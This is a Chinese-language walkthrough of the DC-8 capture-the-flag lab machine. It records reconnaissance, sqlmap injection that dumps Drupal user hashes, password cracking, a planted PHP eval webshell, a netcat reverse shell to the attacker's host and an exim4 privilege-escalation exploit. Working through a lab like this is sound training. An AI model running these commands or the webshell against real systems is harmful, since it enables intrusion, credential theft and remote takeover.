漏洞复习之DC-8

1.搭建靶场扫描靶场端口 sudo arp-scan -I eth0 172.16.1.0/24,目标地址为172.16.1.1362.访问靶场用wappalyzerz指纹识别一下发现为drupal 73.扫描查看所开放的端口 nmap -Pn -A -p- -sS -sC -T4 172.16.1.136发现开放了22 、80端口4.扫描一下是否有敏感目录dirb http://172.16.1.136/ 发现5、当我访问http://172.16.1.136/user 发现后台登陆页面。6、当我点击welcome to DC-8,URLhttp://172.16.1.136/?nid1感觉可能存在sql注入7、直接打一下sqlmap -u http://172.16.1.136/?nid18、查一下数据库名字[*] d7db[*] information_schema1查询表名sqlmap -u http://172.16.1.136/?nid1 -D d7db --tables2查询字段 sqlmap -u http://172.16.1.136/?nid1 -D d7db -T users --columns 发现name和pass3查询数据sqlmap -u http://172.16.1.136/?nid1 -D d7db -T users -C name,pass --dump 找到了admin 和john两个用户admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5zjohn | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF9.使用john破解一下密码创建一下文件名hash.txt将哈希值复制到里面去破解出来第二个账户的密码为turtle10.尝试登陆一下登陆成功11、点击content12.写入一句话木马?php eval($_REQUEST[777]); phpinfo();?13.查看一句话木马是否能够被执行,发现phpinfo被执行说明一句话木马也可以被执行14.用蚁剑连接一下15.进入终端模式nc -h 查看一下是否有-e参数果然是有的直接用-e参数连接nc -e /bin/bash 172.16.1.128 1234nc -lnvp 1234python -c import pty;pty.spawn(/bin/bash) 交互式shell16.提权1查看一下id尝试用suid提权发现有个exim4 查看你一下exim4的版本exim4 --sersion2searchspoit exim 检查一下发现有个46996.sh3直接用蚁剑上传不知道能不能提权成功上传到tmp目录下4查看一下权限发现没有权限chmod x 46996.sh添加可以执行权限./46996.sh 执行文件发现提权失败5查看一下帮助信息发现让我们指定参数看下源码6既然如此我们就尝试一下这两种方式./46996.sh -m setuid 不行提权失败./46996.sh -m netcat 提权成功7查看flag